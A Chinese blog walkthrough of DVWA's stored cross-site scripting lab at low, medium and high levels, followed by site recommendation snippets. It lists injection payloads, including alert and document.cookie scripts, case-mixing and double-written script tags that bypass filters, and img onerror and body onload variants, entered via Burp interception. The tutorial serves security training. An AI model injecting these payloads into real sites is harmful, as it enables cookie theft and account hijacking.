【DVWA-master】存储型xss(详)

于 2024-10-03 17:16:42 发布
阅读量293 收藏 6
点赞数 10
文章标签: xss php 前端 mysql 数据库 sql database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mw18211406853/article/details/142686140
版权

进入DVWA-master,点击DVWA security ,选择安全级别为low(初级)

点击XSS(Stored)  存储型XSS

一.存储型XSS(初级)

1.name假设输入11(随便输)

在message输入<script>alert(/xss/)</script>

执行按sign guestbook出现谈话框,并且执行完后会下面有记录,若在执行下一条的时候若不先清空会先执行存储的先,所以最好执行一条后就及时清空,按clear guestbook即可

2.查询当前cookie

message输入  <script>alert(document.cookie)</script>

二.存储型XSS(中级)

点击DVWA security ,选择安全级别为medium(中级)

会发现name字段后端限制了字数,所以最好借助burp工具抓包来挖掘,查看程序源码会发现对name段进行了替换,要想办法绕过(可用大小写混淆和双写绕过),跟反射性xss中级差不多,只不过是用到了burp工具

1,大小写混淆绕过

(1)抓包

(2)改成<ScriPt>alert(/xss/)</script> 然后按forward 出现弹框

(3)查询当前页面的cookie  改成<ScriPt>alert(document.cookie)</script>

2.双写绕过(跟上面的一样执行语句就好了)

<sc<script>ript>alert(/xss/)</script>

<sc<script>ript>alert(document.cookie)</script>

二.存储型XSS(高级)

安全级别设置高级,存储型高级也要用burp抓包挖掘,查看程序源码,对<script>进行了过滤,不能用一般的绕过方法,所以可以用其他语句,如img标签和body标签

抓包

(1)用img标签

在burp输入<img src=1 οnerrοr=alert(/xss/)>按forward出现弹框(具体步骤初级有演示这里就不详细演示了)

查询当前页面的cookie

改成<img src=1 οnerrοr=alert(document.cookie)>  

2.用body标签

操作一样

<body οnlοad=alert(/xss/)>   会出现弹框说明有xss漏洞
<body οnlοad=alert(document.cookie)>  查看当前的cookie

晨曦wx
关注
DVWA-master.zip
01-04
DVWA中的XSS练习涵盖了反射存储两种类,让你了解如何防范这种攻击,比如使用输入验证、转义特殊字符以及设置HTTP-only cookie等。 4. **命令注入** 在DVWA中,命令注入漏洞允许攻击者执行服务器上的任意...
DVWA-master安装包
02-28
2. **跨站脚本(XSS)**:分为反射存储两种,XSS允许攻击者通过注入可执行的JavaScript代码来窃取用户cookie或其他敏感信息。 3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或...
DVWA-master.rar
03-15
2. **跨站脚本(XSS)**: "XSS"挑战展示了反射XSS存储XSS的实例,教育用户如何防止恶意脚本注入到页面中。 3. **文件包含**: "文件包含"漏洞让攻击者能够控制服务器加载的文件,可能导致敏感信息泄露或执行任意...
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 208
xss盲打,不是一种漏洞类,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 811
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
XSS(内含DVWA
m0_73902453的博客
09-27 843
反射 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
Pikachu-xss防范措施 - href输出 & js输出
guanrongl的专栏
10-03 318
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
Pikachu-Cross-Site Scripting-反射xss(get)
guanrongl的专栏
10-02 481
存储XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
Pikachu-Cross-Site Scripting-xss之htmlspecialchars
guanrongl的专栏
10-03 170
查看页面元素,可以看到这里对一些符号做了转换,但是 单引号等几个符号没处理;提交,得到xss攻击。
【CTF Web】Pikachu 反射xss(get) Writeup(反射XSS+GET请求)
HEX9CF的技术博客
09-28 594
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射性XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
最新发布
10-03 1067
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 592
php安装之后,修改httpd.conf无法运行Apache的解决方案
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1015
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1335
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
RCE+[伪协议综合]
2302_81328699的博客
10-03 243
伪协议综合
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1159
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
php socket客户端
qq_30754685的博客
09-30 312
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
基于php的医院信息管理系统
计算机学姐的博客
09-28 1036
【2025最新】基于php+vue+MySQL的医院信息管理系统,前后端分离。
第168天:应急响应-ELK 日志分析系统&Yara规则&样本识别&特征提取&规则编写
weixin_71529930的博客
09-30 995
案例一:ELK 搭建使用-导入文件&监控日志&语法筛选该软件是专业分析日志的工具,但是不支持安全软件的分析这里我是在kali中搭建的搭建参考文章:(第一篇成功,第二篇呢可能是国外的docker关闭了未成功)(本地搭建)(docker搭建)安装完成的界面三种模式选择日志上传上传文件导入命名并导入上传完成以后去查看可以根据不同类别去分类查看IP时间戳ua头这里看到呢ua头有个sqlmap直接定位搜索特征字符不是单独出现,需要在前后加上*
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHPMySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击、命令执行等,用户可以通过对这些漏洞进行测试和攻击来提高自己的网络安全意识和技能。 dvwa-master zip的安装非常简便,只需将其解压到服务器的Web目录下,并配置好数据库连接信息即可。一旦安装完成,用户就可以通过浏览器访问dvwa-master zip的前端界面,并开始进行安全测试和漏洞扫描。 dvwa-master zip提供了多个不同的安全级别,从易到难,供用户选择。在低级别中,漏洞和脆弱性的例子会更为简单和明显;而在高级别中,这些漏洞将会更加难以察觉和利用,需要用户具备更高的技术水平。 通过dvwa-master zip,用户可以模拟和测试真实的网络安全风险,学习如何防范和修复相关漏洞。它对于安全工程师、渗透测试人员、Web开发人员等具有较高的教育和培训价值。值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值